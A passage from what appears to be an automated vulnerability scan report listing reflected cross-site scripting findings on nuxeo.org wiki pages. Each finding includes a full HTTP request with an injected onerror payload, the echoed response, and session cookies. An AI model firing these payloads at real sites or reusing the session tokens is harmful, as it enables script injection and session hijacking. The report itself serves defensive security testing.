Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Tagsf901e%3Cimg+src%3Da+onerror%3Dalert%281%29%3E63acc2cbc28'>Tagsf901e<img src=a onerror=alert(1)>63acc2cbc28</a>
...[SNIP]...

1.111. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed was submitted in the REST URL parameter 5. This input was echoed as 7d0e5"><img src=a onerror=alert(1)>430e2cf64ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tags7d0e5"><img%20src%3da%20onerror%3dalert(1)>430e2cf64ed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:05 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Tags7d0e5%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E430e2cf64ed?format=xar&amp;name=Main.Tags7d0e5"><img src=a onerror=alert(1)>430e2cf64ed&amp;pages=Main.Tags7d0e5">
...[SNIP]...

1.112. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a was submitted in the REST URL parameter 4. This input was echoed as f0e56<img src=a onerror=alert(1)>8311f0b5e3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainf0e56<img%20src%3da%20onerror%3dalert(1)>8311f0b5e3a/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13187
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Mainf0e56%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8311f0b5e3a/">Mainf0e56<img src=a onerror=alert(1)>8311f0b5e3a</a>
...[SNIP]...

1.113. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703 was submitted in the REST URL parameter 4. This input was echoed as be1aa"><img src=a onerror=alert(1)>c2cf5c63703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Mainbe1aa"><img%20src%3da%20onerror%3dalert(1)>c2cf5c63703/Understanding+JBoss+Directories HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13253
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainbe1aa%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec2cf5c63703/Understanding+JBoss+Directories?format=xar&amp;name=Mainbe1aa"><img src=a onerror=alert(1)>c2cf5c63703.Understanding JBoss Directories&amp;pages=Mainbe1aa">
...[SNIP]...

1.114. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae was submitted in the REST URL parameter 5. This input was echoed as e87d7"><img src=a onerror=alert(1)>89b0697bfae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriese87d7"><img%20src%3da%20onerror%3dalert(1)>89b0697bfae HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:49 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13237
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
a href="http://www.nuxeo.org/xwiki/bin/export/Main/Understanding+JBoss+Directoriese87d7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E89b0697bfae?format=xar&amp;name=Main.Understanding JBoss Directoriese87d7"><img src=a onerror=alert(1)>89b0697bfae&amp;pages=Main.Understanding JBoss Directoriese87d7">
...[SNIP]...

1.115. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Understanding+JBoss+Directories

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c was submitted in the REST URL parameter 5. This input was echoed as a2dfb<img src=a onerror=alert(1)>c65f4a3268c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb<img%20src%3da%20onerror%3dalert(1)>c65f4a3268c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13175
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directoriesa2dfb%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec65f4a3268c'>Understanding JBoss Directoriesa2dfb<img src=a onerror=alert(1)>c65f4a3268c</a>
...[SNIP]...

1.116. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eab17<img%20src%3da%20onerror%3dalert(1)>123105c7679 was submitted in the REST URL parameter 4. This input was echoed as eab17<img src=a onerror=alert(1)>123105c7679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maineab17<img%20src%3da%20onerror%3dalert(1)>123105c7679/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:35 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12979
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Maineab17%3Cimg+src%3Da+onerror%3Dalert%281%29%3E123105c7679/">Maineab17<img src=a onerror=alert(1)>123105c7679</a>
...[SNIP]...

1.117. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5 was submitted in the REST URL parameter 4. This input was echoed as 49dbe"><img src=a onerror=alert(1)>8944e5657f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main49dbe"><img%20src%3da%20onerror%3dalert(1)>8944e5657f5/Using+Nuxeo+API HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:11 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13045
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main49dbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8944e5657f5/Using+Nuxeo+API?format=xar&amp;name=Main49dbe"><img src=a onerror=alert(1)>8944e5657f5.Using Nuxeo API&amp;pages=Main49dbe">
...[SNIP]...

1.118. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 was submitted in the REST URL parameter 5. This input was echoed as 50755"><img src=a onerror=alert(1)>95dc43f2514 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API50755"><img%20src%3da%20onerror%3dalert(1)>95dc43f2514 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13029
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/Using+Nuxeo+API50755%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E95dc43f2514?format=xar&amp;name=Main.Using Nuxeo API50755"><img src=a onerror=alert(1)>95dc43f2514&amp;pages=Main.Using Nuxeo API50755">
...[SNIP]...

1.119. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Using+Nuxeo+API

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf was submitted in the REST URL parameter 5. This input was echoed as 5e592<img src=a onerror=alert(1)>203fdc532cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Using+Nuxeo+API5e592<img%20src%3da%20onerror%3dalert(1)>203fdc532cf HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:06 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12967
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API5e592%3Cimg+src%3Da+onerror%3Dalert%281%29%3E203fdc532cf'>Using Nuxeo API5e592<img src=a onerror=alert(1)>203fdc532cf</a>
...[SNIP]...

1.120. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef was submitted in the REST URL parameter 4. This input was echoed as 7cb09"><img src=a onerror=alert(1)>27e195a34ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main7cb09"><img%20src%3da%20onerror%3dalert(1)>27e195a34ef/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:12:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main7cb09%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E27e195a34ef/WebRss?format=xar&amp;name=Main7cb09"><img src=a onerror=alert(1)>27e195a34ef.WebRss&amp;pages=Main7cb09">
...[SNIP]...

1.121. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2 was submitted in the REST URL parameter 4. This input was echoed as 76490<img src=a onerror=alert(1)>4484ac9bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main76490<img%20src%3da%20onerror%3dalert(1)>4484ac9bb2/WebRss HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:34 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12845
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main76490%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4484ac9bb2/">Main76490<img src=a onerror=alert(1)>4484ac9bb2</a>
...[SNIP]...

1.122. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 was submitted in the REST URL parameter 5. This input was echoed as cbc6a<img src=a onerror=alert(1)>c41e6b9b885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/WebRsscbc6a<img%20src%3da%20onerror%3dalert(1)>c41e6b9b885 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12846
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/WebRsscbc6a%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec41e6b9b885'>WebRsscbc6a<img src=a onerror=alert(1)>c41e6b9b885</a>
...[SNIP]...

1.123. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/WebRss

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89aa6"><img%20src%3da%20onerror%3dalert(1)>625cf66d6b7 was submitted in the REST URL parameter 5. This input was echoed as 89aa6"><img src=a onerror=alert(1)>625cf66d6b7 in the application's response.

